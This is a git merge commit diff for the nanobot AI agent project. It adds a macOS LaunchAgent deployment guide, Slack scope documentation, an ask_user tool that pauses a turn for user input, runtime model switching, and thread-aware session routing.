Merge origin/main into fix/msteams-prune-stale-refs

Resolve the MSTeams stale-reference cleanup conflict by keeping the PR's locked, atomic sidecar-meta implementation and aligning the merged test expectation locally.

Made-with: Cursor
This commit is contained in:
Xubin Ren 2026-04-27 07:29:48 +00:00
commit 3d75aedcac
68 changed files with 4279 additions and 359 deletions

View File

@ -87,6 +87,11 @@ ruff check nanobot/
ruff format nanobot/
```
## Contribution License
By submitting a contribution, you confirm that you have the right to submit it
and agree that it will be licensed under the project's MIT License.
## Code Style
We care about more than passing lint. We want nanobot to stay small, calm, and readable.

View File

@ -1,6 +1,6 @@
MIT License
Copyright (c) 2025 nanobot contributors
Copyright (c) 2025-present Xubin Ren and the nanobot contributors
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal

View File

@ -282,6 +282,10 @@ PRs welcome! The codebase is intentionally small and readable. 🤗
- **More integrations** — Calendar and more
- **Self-improvement** — Learn from feedback and mistakes
## Contact
This project was started by [Xubin Ren](https://github.com/re-bin) as a personal open-source project and continues to be maintained in an individual capacity using personal resources, with contributions from the open-source community. Feel free to contact [xubinrencs@gmail.com](mailto:xubinrencs@gmail.com) for questions, ideas, or collaboration.
### Contributors
<a href="https://github.com/HKUDS/nanobot/graphs/contributors">

View File

@ -18,7 +18,7 @@ Start here for setup, everyday usage, and deployment.
| CLI reference | [`cli-reference.md`](./cli-reference.md) | Core CLI commands and common entrypoints |
| In-chat commands | [`chat-commands.md`](./chat-commands.md) | Slash commands and periodic task behavior |
| OpenAI-compatible API | [`openai-api.md`](./openai-api.md) | Local API endpoints, request format, and file uploads |
| Deployment | [`deployment.md`](./deployment.md) | Docker and Linux service setup |
| Deployment | [`deployment.md`](./deployment.md) | Docker, Linux service, and macOS LaunchAgent setup |
## Advanced Docs

View File

@ -434,11 +434,13 @@ Uses **Socket Mode** — no public URL required.
**2. Configure the app**
- **Socket Mode**: Toggle ON → Generate an **App-Level Token** with `connections:write` scope → copy it (`xapp-...`)
- **OAuth & Permissions**: Add bot scopes: `chat:write`, `reactions:write`, `app_mentions:read`
- **OAuth & Permissions**: Add bot scopes: `chat:write`, `reactions:write`, `app_mentions:read`, `files:read`, `files:write`, `channels:history`, `groups:history`, `im:history`, `mpim:history`
- **Event Subscriptions**: Toggle ON → Subscribe to bot events: `message.im`, `message.channels`, `app_mention` → Save Changes
- **App Home**: Scroll to **Show Tabs** → Enable **Messages Tab** → Check **"Allow users to send Slash commands and messages from the messages tab"**
- **Install App**: Click **Install to Workspace** → Authorize → copy the **Bot Token** (`xoxb-...`)
> `files:read` is required to read files users send to nanobot. `files:write` is required for nanobot to send images, videos, and other file uploads. If you add either scope later, reinstall the Slack app to the workspace and restart nanobot so it uses the updated bot token.
**3. Configure nanobot**
```json

View File

@ -92,3 +92,75 @@ If you edit the `.service` file itself, run `systemctl --user daemon-reload` bef
> ```bash
> loginctl enable-linger $USER
> ```
## macOS LaunchAgent
Use a LaunchAgent when you want `nanobot gateway` to stay online after you log in, without keeping a terminal open.
**1. Get the absolute `nanobot` path:**
```bash
which nanobot # e.g. /Users/youruser/.local/bin/nanobot
```
Use that exact path in the plist. It keeps the Python environment from your install method.
**2. Create `~/Library/LaunchAgents/ai.nanobot.gateway.plist`:**
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>ai.nanobot.gateway</string>
<key>ProgramArguments</key>
<array>
<string>/Users/youruser/.local/bin/nanobot</string>
<string>gateway</string>
<string>--workspace</string>
<string>/Users/youruser/.nanobot/workspace</string>
</array>
<key>WorkingDirectory</key>
<string>/Users/youruser/.nanobot/workspace</string>
<key>RunAtLoad</key>
<true/>
<key>KeepAlive</key>
<dict>
<key>SuccessfulExit</key>
<false/>
</dict>
<key>StandardOutPath</key>
<string>/Users/youruser/.nanobot/logs/gateway.log</string>
<key>StandardErrorPath</key>
<string>/Users/youruser/.nanobot/logs/gateway.error.log</string>
</dict>
</plist>
```
**3. Load and start it:**
```bash
mkdir -p ~/Library/LaunchAgents ~/.nanobot/logs
launchctl bootstrap gui/$(id -u) ~/Library/LaunchAgents/ai.nanobot.gateway.plist
launchctl enable gui/$(id -u)/ai.nanobot.gateway
launchctl kickstart -k gui/$(id -u)/ai.nanobot.gateway
```
**Common operations:**
```bash
launchctl list | grep ai.nanobot.gateway
launchctl kickstart -k gui/$(id -u)/ai.nanobot.gateway # restart
launchctl bootout gui/$(id -u) ~/Library/LaunchAgents/ai.nanobot.gateway.plist
```
After editing the plist, run `launchctl bootout ...` and `launchctl bootstrap ...` again.
> **Note:** if startup fails with "address already in use", stop the manually started `nanobot gateway` process first.

View File

@ -20,14 +20,21 @@ from nanobot.agent.memory import Consolidator, Dream
from nanobot.agent.runner import _MAX_INJECTIONS_PER_TURN, AgentRunner, AgentRunSpec
from nanobot.agent.skills import BUILTIN_SKILLS_DIR
from nanobot.agent.subagent import SubagentManager
from nanobot.agent.tools.ask import (
AskUserTool,
ask_user_options_from_messages,
ask_user_outbound,
ask_user_tool_result_messages,
pending_ask_user_id,
)
from nanobot.agent.tools.cron import CronTool
from nanobot.agent.tools.filesystem import EditFileTool, ListDirTool, ReadFileTool, WriteFileTool
from nanobot.agent.tools.message import MessageTool
from nanobot.agent.tools.notebook import NotebookEditTool
from nanobot.agent.tools.registry import ToolRegistry
from nanobot.agent.tools.search import GlobTool, GrepTool
from nanobot.agent.tools.shell import ExecTool
from nanobot.agent.tools.self import MyTool
from nanobot.agent.tools.shell import ExecTool
from nanobot.agent.tools.spawn import SpawnTool
from nanobot.agent.tools.web import WebFetchTool, WebSearchTool
from nanobot.bus.events import InboundMessage, OutboundMessage
@ -35,6 +42,7 @@ from nanobot.bus.queue import MessageBus
from nanobot.command import CommandContext, CommandRouter, register_builtin_commands
from nanobot.config.schema import AgentDefaults
from nanobot.providers.base import LLMProvider
from nanobot.providers.factory import ProviderSnapshot
from nanobot.session.manager import Session, SessionManager
from nanobot.utils.document import extract_documents
from nanobot.utils.helpers import image_placeholder_text
@ -68,6 +76,8 @@ class _LoopHook(AgentHook):
channel: str = "cli",
chat_id: str = "direct",
message_id: str | None = None,
metadata: dict[str, Any] | None = None,
session_key: str | None = None,
) -> None:
super().__init__(reraise=True)
self._loop = agent_loop
@ -77,6 +87,8 @@ class _LoopHook(AgentHook):
self._channel = channel
self._chat_id = chat_id
self._message_id = message_id
self._metadata = metadata or {}
self._session_key = session_key
self._stream_buf = ""
def wants_streaming(self) -> bool:
@ -119,7 +131,13 @@ class _LoopHook(AgentHook):
for tc in context.tool_calls:
args_str = json.dumps(tc.arguments, ensure_ascii=False)
logger.info("Tool call: {}({})", tc.name, args_str[:200])
self._loop._set_tool_context(self._channel, self._chat_id, self._message_id)
self._loop._set_tool_context(
self._channel,
self._chat_id,
self._message_id,
self._metadata,
session_key=self._session_key,
)
async def after_iteration(self, context: AgentHookContext) -> None:
if (
@ -183,10 +201,13 @@ class AgentLoop:
channels_config: ChannelsConfig | None = None,
timezone: str | None = None,
session_ttl_minutes: int = 0,
consolidation_ratio: float = 0.5,
hooks: list[AgentHook] | None = None,
unified_session: bool = False,
disabled_skills: list[str] | None = None,
tools_config: ToolsConfig | None = None,
provider_snapshot_loader: Callable[[], ProviderSnapshot] | None = None,
provider_signature: tuple[object, ...] | None = None,
):
from nanobot.config.schema import ExecToolConfig, ToolsConfig, WebToolsConfig
@ -195,6 +216,8 @@ class AgentLoop:
self.bus = bus
self.channels_config = channels_config
self.provider = provider
self._provider_snapshot_loader = provider_snapshot_loader
self._provider_signature = provider_signature
self.workspace = workspace
self.model = model or provider.get_default_model()
self.max_iterations = (
@ -262,6 +285,7 @@ class AgentLoop:
build_messages=self.context.build_messages,
get_tool_definitions=self.tools.get_definitions,
max_completion_tokens=provider.generation.max_tokens,
consolidation_ratio=consolidation_ratio,
)
self.auto_compact = AutoCompact(
sessions=self.sessions,
@ -281,12 +305,43 @@ class AgentLoop:
self.commands = CommandRouter()
register_builtin_commands(self.commands)
def _apply_provider_snapshot(self, snapshot: ProviderSnapshot) -> None:
"""Swap model/provider for future turns without disturbing an active one."""
provider = snapshot.provider
model = snapshot.model
context_window_tokens = snapshot.context_window_tokens
if self.provider is provider and self.model == model:
return
old_model = self.model
self.provider = provider
self.model = model
self.context_window_tokens = context_window_tokens
self.runner.provider = provider
self.subagents.set_provider(provider, model)
self.consolidator.set_provider(provider, model, context_window_tokens)
self.dream.set_provider(provider, model)
self._provider_signature = snapshot.signature
logger.info("Runtime model switched for next turn: {} -> {}", old_model, model)
def _refresh_provider_snapshot(self) -> None:
if self._provider_snapshot_loader is None:
return
try:
snapshot = self._provider_snapshot_loader()
except Exception:
logger.exception("Failed to refresh provider config")
return
if snapshot.signature == self._provider_signature:
return
self._apply_provider_snapshot(snapshot)
def _register_default_tools(self) -> None:
"""Register the default set of tools."""
allowed_dir = (
self.workspace if (self.restrict_to_workspace or self.exec_config.sandbox) else None
)
extra_read = [BUILTIN_SKILLS_DIR] if allowed_dir else None
self.tools.register(AskUserTool())
self.tools.register(
ReadFileTool(
workspace=self.workspace, allowed_dir=allowed_dir, extra_allowed_dirs=extra_read
@ -313,7 +368,7 @@ class AgentLoop:
WebSearchTool(config=self.web_config.search, proxy=self.web_config.proxy)
)
self.tools.register(WebFetchTool(proxy=self.web_config.proxy))
self.tools.register(MessageTool(send_callback=self.bus.publish_outbound))
self.tools.register(MessageTool(send_callback=self.bus.publish_outbound, workspace=self.workspace))
self.tools.register(SpawnTool(manager=self.subagents))
if self.cron_service:
self.tools.register(
@ -342,18 +397,33 @@ class AgentLoop:
finally:
self._mcp_connecting = False
def _set_tool_context(self, channel: str, chat_id: str, message_id: str | None = None) -> None:
def _set_tool_context(
self, channel: str, chat_id: str,
message_id: str | None = None, metadata: dict | None = None,
session_key: str | None = None,
) -> None:
"""Update context for all tools that need routing info."""
# Compute the effective session key (accounts for unified sessions)
# so that subagent results route to the correct pending queue.
effective_key = UNIFIED_SESSION_KEY if self._unified_session else f"{channel}:{chat_id}"
# When the caller threads a thread-scoped session_key (e.g. slack with
# reply_in_thread: true), honor it so spawn announces route back to
# the originating thread session. Falls back to unified mode or
# channel:chat_id for callers that don't have a thread-scoped key.
if session_key is not None:
effective_key = session_key
elif self._unified_session:
effective_key = UNIFIED_SESSION_KEY
else:
effective_key = f"{channel}:{chat_id}"
for name in ("message", "spawn", "cron", "my"):
if tool := self.tools.get(name):
if hasattr(tool, "set_context"):
if name == "spawn":
tool.set_context(channel, chat_id, effective_key=effective_key)
elif name == "cron":
tool.set_context(channel, chat_id, metadata=metadata, session_key=session_key)
elif name == "message":
tool.set_context(channel, chat_id, message_id, metadata=metadata)
else:
tool.set_context(channel, chat_id, *([message_id] if name == "message" else []))
tool.set_context(channel, chat_id)
@staticmethod
def _strip_think(text: str | None) -> str | None:
@ -419,6 +489,8 @@ class AgentLoop:
channel: str = "cli",
chat_id: str = "direct",
message_id: str | None = None,
metadata: dict[str, Any] | None = None,
session_key: str | None = None,
pending_queue: asyncio.Queue | None = None,
) -> tuple[str | None, list[str], list[dict], str, bool]:
"""Run the agent iteration loop.
@ -438,6 +510,8 @@ class AgentLoop:
channel=channel,
chat_id=chat_id,
message_id=message_id,
metadata=metadata,
session_key=session_key,
)
hook: AgentHook = (
CompositeHook([loop_hook] + self._extra_hooks) if self._extra_hooks else loop_hook
@ -758,13 +832,17 @@ class AgentLoop:
pending_queue: asyncio.Queue | None = None,
) -> OutboundMessage | None:
"""Process a single inbound message and return the response."""
self._refresh_provider_snapshot()
# System messages: parse origin from chat_id ("channel:chat_id")
if msg.channel == "system":
channel, chat_id = (
msg.chat_id.split(":", 1) if ":" in msg.chat_id else ("cli", msg.chat_id)
)
logger.info("Processing system message from {}", msg.sender_id)
key = f"{channel}:{chat_id}"
# Honor session_key_override so subagent announces from threaded
# callers route to the originating thread session, not the
# channel-level session derived from chat_id.
key = msg.session_key_override or f"{channel}:{chat_id}"
session = self.sessions.get_or_create(key)
if self._restore_runtime_checkpoint(session):
self.sessions.save(session)
@ -785,8 +863,11 @@ class AgentLoop:
is_subagent = msg.sender_id == "subagent"
if is_subagent and self._persist_subagent_followup(session, msg):
self.sessions.save(session)
self._set_tool_context(channel, chat_id, msg.metadata.get("message_id"))
history = session.get_history(max_messages=0)
self._set_tool_context(
channel, chat_id, msg.metadata.get("message_id"),
msg.metadata, session_key=key,
)
history = session.get_history(max_messages=0, include_timestamps=True)
current_role = "assistant" if is_subagent else "user"
# Subagent content is already in `history` above; passing it again
@ -799,19 +880,37 @@ class AgentLoop:
session_summary=pending,
current_role=current_role,
)
final_content, _, all_msgs, _, _ = await self._run_agent_loop(
final_content, _, all_msgs, stop_reason, _ = await self._run_agent_loop(
messages, session=session, channel=channel, chat_id=chat_id,
message_id=msg.metadata.get("message_id"),
metadata=msg.metadata,
session_key=key,
pending_queue=pending_queue,
)
self._save_turn(session, all_msgs, 1 + len(history))
self._clear_runtime_checkpoint(session)
self.sessions.save(session)
self._schedule_background(self.consolidator.maybe_consolidate_by_tokens(session))
options = ask_user_options_from_messages(all_msgs) if stop_reason == "ask_user" else []
content, buttons = ask_user_outbound(
final_content or "Background task completed.",
options,
channel,
)
# Reconstruct channel-specific metadata from session.key so the
# outbound reply lands in the originating thread (not the channel
# top-level). The announce InboundMessage carries only
# injected_event metadata; we recover thread_ts from the session
# key, which slack writes as "slack:<chat_id>:<thread_ts>".
outbound_metadata: dict[str, Any] = {}
if channel == "slack" and key.startswith("slack:") and key.count(":") >= 2:
outbound_metadata["slack"] = {"thread_ts": key.split(":", 2)[2]}
return OutboundMessage(
channel=channel,
chat_id=chat_id,
content=final_content or "Background task completed.",
content=content,
buttons=buttons,
metadata=outbound_metadata,
)
# Extract document text from media at the processing boundary so all
@ -843,21 +942,33 @@ class AgentLoop:
session_summary=pending,
)
self._set_tool_context(msg.channel, msg.chat_id, msg.metadata.get("message_id"))
self._set_tool_context(
msg.channel, msg.chat_id, msg.metadata.get("message_id"),
msg.metadata, session_key=key,
)
if message_tool := self.tools.get("message"):
if isinstance(message_tool, MessageTool):
message_tool.start_turn()
history = session.get_history(max_messages=0)
history = session.get_history(max_messages=0, include_timestamps=True)
initial_messages = self.context.build_messages(
history=history,
current_message=msg.content,
session_summary=pending,
media=msg.media if msg.media else None,
channel=msg.channel,
chat_id=msg.chat_id,
)
pending_ask_id = pending_ask_user_id(history)
if pending_ask_id:
initial_messages = ask_user_tool_result_messages(
self.context.build_system_prompt(channel=msg.channel),
history,
pending_ask_id,
msg.content,
)
else:
initial_messages = self.context.build_messages(
history=history,
current_message=msg.content,
session_summary=pending,
media=msg.media if msg.media else None,
channel=msg.channel,
chat_id=msg.chat_id,
)
async def _bus_progress(
content: str,
@ -898,7 +1009,7 @@ class AgentLoop:
user_persisted_early = False
media_paths = [p for p in (msg.media or []) if isinstance(p, str) and p]
has_text = isinstance(msg.content, str) and msg.content.strip()
if has_text or media_paths:
if not pending_ask_id and (has_text or media_paths):
extra: dict[str, Any] = {"media": list(media_paths)} if media_paths else {}
text = msg.content if isinstance(msg.content, str) else ""
session.add_message("user", text, **extra)
@ -916,6 +1027,8 @@ class AgentLoop:
channel=msg.channel,
chat_id=msg.chat_id,
message_id=msg.metadata.get("message_id"),
metadata=msg.metadata,
session_key=key,
pending_queue=pending_queue,
)
@ -944,13 +1057,19 @@ class AgentLoop:
logger.info("Response to {}:{}: {}", msg.channel, msg.sender_id, preview)
meta = dict(msg.metadata or {})
if on_stream is not None and stop_reason != "error":
final_content, buttons = ask_user_outbound(
final_content,
ask_user_options_from_messages(all_msgs) if stop_reason == "ask_user" else [],
msg.channel,
)
if on_stream is not None and stop_reason not in {"ask_user", "error"}:
meta["_streamed"] = True
return OutboundMessage(
channel=msg.channel,
chat_id=msg.chat_id,
content=final_content,
metadata=meta,
buttons=buttons,
)
def _sanitize_persisted_blocks(

View File

@ -435,6 +435,7 @@ class Consolidator:
build_messages: Callable[..., list[dict[str, Any]]],
get_tool_definitions: Callable[[], list[dict[str, Any]]],
max_completion_tokens: int = 4096,
consolidation_ratio: float = 0.5,
):
self.store = store
self.provider = provider
@ -442,12 +443,24 @@ class Consolidator:
self.sessions = sessions
self.context_window_tokens = context_window_tokens
self.max_completion_tokens = max_completion_tokens
self.consolidation_ratio = consolidation_ratio
self._build_messages = build_messages
self._get_tool_definitions = get_tool_definitions
self._locks: weakref.WeakValueDictionary[str, asyncio.Lock] = (
weakref.WeakValueDictionary()
)
def set_provider(
self,
provider: LLMProvider,
model: str,
context_window_tokens: int,
) -> None:
self.provider = provider
self.model = model
self.context_window_tokens = context_window_tokens
self.max_completion_tokens = provider.generation.max_tokens
def get_lock(self, session_key: str) -> asyncio.Lock:
"""Return the shared consolidation lock for one session."""
return self._locks.setdefault(session_key, asyncio.Lock())
@ -481,7 +494,7 @@ class Consolidator:
session_summary: str | None = None,
) -> tuple[int, str]:
"""Estimate current prompt size for the normal session history view."""
history = session.get_history(max_messages=0)
history = session.get_history(max_messages=0, include_timestamps=True)
channel, chat_id = (session.key.split(":", 1) if ":" in session.key else (None, None))
probe_messages = self._build_messages(
history=history,
@ -568,7 +581,7 @@ class Consolidator:
lock = self.get_lock(session.key)
async with lock:
budget = self._input_token_budget
target = budget // 2
target = int(budget * self.consolidation_ratio)
try:
estimated, source = self.estimate_session_prompt_tokens(
session,
@ -708,6 +721,11 @@ class Dream:
self._runner = AgentRunner(provider)
self._tools = self._build_tools()
def set_provider(self, provider: LLMProvider, model: str) -> None:
self.provider = provider
self.model = model
self._runner.provider = provider
# -- tool registry -------------------------------------------------------
def _build_tools(self) -> ToolRegistry:

View File

@ -3,16 +3,16 @@
from __future__ import annotations
import asyncio
from dataclasses import dataclass, field
import inspect
import os
from dataclasses import dataclass, field
from pathlib import Path
from typing import Any
from loguru import logger
from nanobot.agent.hook import AgentHook, AgentHookContext
from nanobot.utils.prompt_templates import render_template
from nanobot.agent.tools.ask import AskUserInterrupt
from nanobot.agent.tools.registry import ToolRegistry
from nanobot.providers.base import LLMProvider, LLMResponse, ToolCallRequest
from nanobot.utils.helpers import (
@ -23,6 +23,7 @@ from nanobot.utils.helpers import (
maybe_persist_tool_result,
truncate_text,
)
from nanobot.utils.prompt_templates import render_template
from nanobot.utils.runtime import (
EMPTY_FINAL_RESPONSE_MESSAGE,
build_finalization_retry_message,
@ -277,17 +278,22 @@ class AgentRunner:
self._accumulate_usage(usage, raw_usage)
if response.should_execute_tools:
tool_calls = list(response.tool_calls)
ask_index = next((i for i, tc in enumerate(tool_calls) if tc.name == "ask_user"), None)
if ask_index is not None:
tool_calls = tool_calls[: ask_index + 1]
context.tool_calls = list(tool_calls)
if hook.wants_streaming():
await hook.on_stream_end(context, resuming=True)
assistant_message = build_assistant_message(
response.content or "",
tool_calls=[tc.to_openai_tool_call() for tc in response.tool_calls],
tool_calls=[tc.to_openai_tool_call() for tc in tool_calls],
reasoning_content=response.reasoning_content,
thinking_blocks=response.thinking_blocks,
)
messages.append(assistant_message)
tools_used.extend(tc.name for tc in response.tool_calls)
tools_used.extend(tc.name for tc in tool_calls)
await self._emit_checkpoint(
spec,
{
@ -296,7 +302,7 @@ class AgentRunner:
"model": spec.model,
"assistant_message": assistant_message,
"completed_tool_results": [],
"pending_tool_calls": [tc.to_openai_tool_call() for tc in response.tool_calls],
"pending_tool_calls": [tc.to_openai_tool_call() for tc in tool_calls],
},
)
@ -304,14 +310,16 @@ class AgentRunner:
results, new_events, fatal_error = await self._execute_tools(
spec,
response.tool_calls,
tool_calls,
external_lookup_counts,
)
tool_events.extend(new_events)
context.tool_results = list(results)
context.tool_events = list(new_events)
completed_tool_results: list[dict[str, Any]] = []
for tool_call, result in zip(response.tool_calls, results):
for tool_call, result in zip(tool_calls, results):
if isinstance(fatal_error, AskUserInterrupt) and tool_call.name == "ask_user":
continue
tool_message = {
"role": "tool",
"tool_call_id": tool_call.id,
@ -326,6 +334,15 @@ class AgentRunner:
messages.append(tool_message)
completed_tool_results.append(tool_message)
if fatal_error is not None:
if isinstance(fatal_error, AskUserInterrupt):
final_content = fatal_error.question
stop_reason = "ask_user"
context.final_content = final_content
context.stop_reason = stop_reason
if hook.wants_streaming():
await hook.on_stream_end(context, resuming=False)
await hook.after_iteration(context)
break
error = f"Error: {type(fatal_error).__name__}: {fatal_error}"
final_content = error
stop_reason = "tool_error"
@ -656,13 +673,21 @@ class AgentRunner:
tool_results: list[tuple[Any, dict[str, str], BaseException | None]] = []
for batch in batches:
if spec.concurrent_tools and len(batch) > 1:
tool_results.extend(await asyncio.gather(*(
batch_results = await asyncio.gather(*(
self._run_tool(spec, tool_call, external_lookup_counts)
for tool_call in batch
)))
))
tool_results.extend(batch_results)
else:
batch_results = []
for tool_call in batch:
tool_results.append(await self._run_tool(spec, tool_call, external_lookup_counts))
result = await self._run_tool(spec, tool_call, external_lookup_counts)
tool_results.append(result)
batch_results.append(result)
if isinstance(result[2], AskUserInterrupt):
break
if any(isinstance(error, AskUserInterrupt) for _, _, error in batch_results):
break
results: list[Any] = []
events: list[dict[str, str]] = []
@ -680,7 +705,7 @@ class AgentRunner:
tool_call: ToolCallRequest,
external_lookup_counts: dict[str, int],
) -> tuple[Any, dict[str, str], BaseException | None]:
_HINT = "\n\n[Analyze the error above and try a different approach.]"
hint = "\n\n[Analyze the error above and try a different approach.]"
lookup_error = repeated_external_lookup_error(
tool_call.name,
tool_call.arguments,
@ -693,8 +718,8 @@ class AgentRunner:
"detail": "repeated external lookup blocked",
}
if spec.fail_on_tool_error:
return lookup_error + _HINT, event, RuntimeError(lookup_error)
return lookup_error + _HINT, event, None
return lookup_error + hint, event, RuntimeError(lookup_error)
return lookup_error + hint, event, None
prepare_call = getattr(spec.tools, "prepare_call", None)
tool, params, prep_error = None, tool_call.arguments, None
if callable(prepare_call):
@ -710,7 +735,7 @@ class AgentRunner:
"status": "error",
"detail": prep_error.split(": ", 1)[-1][:120],
}
return prep_error + _HINT, event, RuntimeError(prep_error) if spec.fail_on_tool_error else None
return prep_error + hint, event, RuntimeError(prep_error) if spec.fail_on_tool_error else None
try:
if tool is not None:
result = await tool.execute(**params)
@ -724,6 +749,9 @@ class AgentRunner:
"status": "error",
"detail": str(exc),
}
if isinstance(exc, AskUserInterrupt):
event["status"] = "waiting"
return "", event, exc
if spec.fail_on_tool_error:
return f"Error: {type(exc).__name__}: {exc}", event, exc
return f"Error: {type(exc).__name__}: {exc}", event, None
@ -735,8 +763,8 @@ class AgentRunner:
"detail": result.replace("\n", " ").strip()[:120],
}
if spec.fail_on_tool_error:
return result + _HINT, event, RuntimeError(result)
return result + _HINT, event, None
return result + hint, event, RuntimeError(result)
return result + hint, event, None
detail = "" if result is None else str(result)
detail = detail.replace("\n", " ").strip()

View File

@ -96,6 +96,11 @@ class SubagentManager:
self._task_statuses: dict[str, SubagentStatus] = {}
self._session_tasks: dict[str, set[str]] = {} # session_key -> {task_id, ...}
def set_provider(self, provider: LLMProvider, model: str) -> None:
self.provider = provider
self.model = model
self.runner.provider = provider
async def spawn(
self,
task: str,

136
nanobot/agent/tools/ask.py Normal file
View File

@ -0,0 +1,136 @@
"""Tool for pausing a turn until the user answers."""
import json
from typing import Any
from nanobot.agent.tools.base import Tool, tool_parameters
from nanobot.agent.tools.schema import ArraySchema, StringSchema, tool_parameters_schema
STRUCTURED_BUTTON_CHANNELS = frozenset({"telegram", "websocket"})
class AskUserInterrupt(BaseException):
"""Internal signal: the runner should stop and wait for user input."""
def __init__(self, question: str, options: list[str] | None = None) -> None:
self.question = question
self.options = [str(option) for option in (options or []) if str(option)]
super().__init__(question)
@tool_parameters(
tool_parameters_schema(
question=StringSchema(
"The question to ask before continuing. Use this only when the task needs the user's answer."
),
options=ArraySchema(
StringSchema("A possible answer label"),
description="Optional choices. The user may still reply with free text.",
),
required=["question"],
)
)
class AskUserTool(Tool):
"""Ask the user a blocking question."""
@property
def name(self) -> str:
return "ask_user"
@property
def description(self) -> str:
return (
"Pause and ask the user a question when their answer is required to continue. "
"Use options for likely answers; the user's reply, typed or selected, is returned as the tool result. "
"For non-blocking notifications or buttons, use the message tool instead."
)
@property
def exclusive(self) -> bool:
return True
async def execute(self, question: str, options: list[str] | None = None, **_: Any) -> Any:
raise AskUserInterrupt(question=question, options=options)
def _tool_call_name(tool_call: dict[str, Any]) -> str:
function = tool_call.get("function")
if isinstance(function, dict) and isinstance(function.get("name"), str):
return function["name"]
name = tool_call.get("name")
return name if isinstance(name, str) else ""
def _tool_call_arguments(tool_call: dict[str, Any]) -> dict[str, Any]:
function = tool_call.get("function")
raw = function.get("arguments") if isinstance(function, dict) else tool_call.get("arguments")
if isinstance(raw, dict):
return raw
if isinstance(raw, str):
try:
parsed = json.loads(raw)
except json.JSONDecodeError:
return {}
return parsed if isinstance(parsed, dict) else {}
return {}
def pending_ask_user_id(history: list[dict[str, Any]]) -> str | None:
pending: dict[str, str] = {}
for message in history:
if message.get("role") == "assistant":
for tool_call in message.get("tool_calls") or []:
if isinstance(tool_call, dict) and isinstance(tool_call.get("id"), str):
pending[tool_call["id"]] = _tool_call_name(tool_call)
elif message.get("role") == "tool":
tool_call_id = message.get("tool_call_id")
if isinstance(tool_call_id, str):
pending.pop(tool_call_id, None)
for tool_call_id, name in reversed(pending.items()):
if name == "ask_user":
return tool_call_id
return None
def ask_user_tool_result_messages(
system_prompt: str,
history: list[dict[str, Any]],
tool_call_id: str,
content: str,
) -> list[dict[str, Any]]:
return [
{"role": "system", "content": system_prompt},
*history,
{
"role": "tool",
"tool_call_id": tool_call_id,
"name": "ask_user",
"content": content,
},
]
def ask_user_options_from_messages(messages: list[dict[str, Any]]) -> list[str]:
for message in reversed(messages):
if message.get("role") != "assistant":
continue
for tool_call in reversed(message.get("tool_calls") or []):
if not isinstance(tool_call, dict) or _tool_call_name(tool_call) != "ask_user":
continue
options = _tool_call_arguments(tool_call).get("options")
if isinstance(options, list):
return [str(option) for option in options if isinstance(option, str)]
return []
def ask_user_outbound(
content: str | None,
options: list[str],
channel: str,
) -> tuple[str | None, list[list[str]]]:
if not options:
return content, []
if channel in STRUCTURED_BUTTON_CHANNELS:
return content, [options]
option_text = "\n".join(f"{index}. {option}" for index, option in enumerate(options, 1))
return f"{content}\n\n{option_text}" if content else option_text, []

View File

@ -60,12 +60,19 @@ class CronTool(Tool):
self._default_timezone = default_timezone
self._channel: ContextVar[str] = ContextVar("cron_channel", default="")
self._chat_id: ContextVar[str] = ContextVar("cron_chat_id", default="")
self._metadata: ContextVar[dict] = ContextVar("cron_metadata", default={})
self._session_key: ContextVar[str] = ContextVar("cron_session_key", default="")
self._in_cron_context: ContextVar[bool] = ContextVar("cron_in_context", default=False)
def set_context(self, channel: str, chat_id: str) -> None:
def set_context(
self, channel: str, chat_id: str,
metadata: dict | None = None, session_key: str | None = None,
) -> None:
"""Set the current session context for delivery."""
self._channel.set(channel)
self._chat_id.set(chat_id)
self._metadata.set(metadata or {})
self._session_key.set(session_key or f"{channel}:{chat_id}")
def set_cron_context(self, active: bool):
"""Mark whether the tool is executing inside a cron job callback."""
@ -199,6 +206,8 @@ class CronTool(Tool):
channel=channel,
to=chat_id,
delete_after_run=delete_after,
channel_meta=self._metadata.get(),
session_key=self._session_key.get() or None,
)
return f"Created job '{job.name}' (id: {job.id})"

View File

@ -2,6 +2,7 @@
import asyncio
import os
import re
import shutil
from contextlib import AsyncExitStack
from typing import Any
@ -28,6 +29,15 @@ _TRANSIENT_EXC_NAMES: frozenset[str] = frozenset((
_WINDOWS_SHELL_LAUNCHERS: frozenset[str] = frozenset(("npx", "npm", "pnpm", "yarn", "bunx"))
# Characters allowed in tool names by model providers (Anthropic, OpenAI, etc.).
# Replace anything outside [a-zA-Z0-9_-] with underscore and collapse runs.
_SANITIZE_RE = re.compile(r"_+")
def _sanitize_name(name: str) -> str:
"""Sanitize an MCP-derived name for model API compatibility."""
return _SANITIZE_RE.sub("_", re.sub(r"[^a-zA-Z0-9_-]", "_", name))
def _is_transient(exc: BaseException) -> bool:
"""Check if an exception looks like a transient connection error."""
@ -137,7 +147,7 @@ class MCPToolWrapper(Tool):
def __init__(self, session, server_name: str, tool_def, tool_timeout: int = 30):
self._session = session
self._original_name = tool_def.name
self._name = f"mcp_{server_name}_{tool_def.name}"
self._name = _sanitize_name(f"mcp_{server_name}_{tool_def.name}")
self._description = tool_def.description or tool_def.name
raw_schema = tool_def.inputSchema or {"type": "object", "properties": {}}
self._parameters = _normalize_schema_for_openai(raw_schema)
@ -221,7 +231,7 @@ class MCPResourceWrapper(Tool):
def __init__(self, session, server_name: str, resource_def, resource_timeout: int = 30):
self._session = session
self._uri = resource_def.uri
self._name = f"mcp_{server_name}_resource_{resource_def.name}"
self._name = _sanitize_name(f"mcp_{server_name}_resource_{resource_def.name}")
desc = resource_def.description or resource_def.name
self._description = f"[MCP Resource] {desc}\nURI: {self._uri}"
self._parameters: dict[str, Any] = {
@ -311,7 +321,7 @@ class MCPPromptWrapper(Tool):
def __init__(self, session, server_name: str, prompt_def, prompt_timeout: int = 30):
self._session = session
self._prompt_name = prompt_def.name
self._name = f"mcp_{server_name}_prompt_{prompt_def.name}"
self._name = _sanitize_name(f"mcp_{server_name}_prompt_{prompt_def.name}")
desc = prompt_def.description or prompt_def.name
self._description = (
f"[MCP Prompt] {desc}\n"
@ -514,9 +524,9 @@ async def connect_mcp_servers(
registered_count = 0
matched_enabled_tools: set[str] = set()
available_raw_names = [tool_def.name for tool_def in tools.tools]
available_wrapped_names = [f"mcp_{name}_{tool_def.name}" for tool_def in tools.tools]
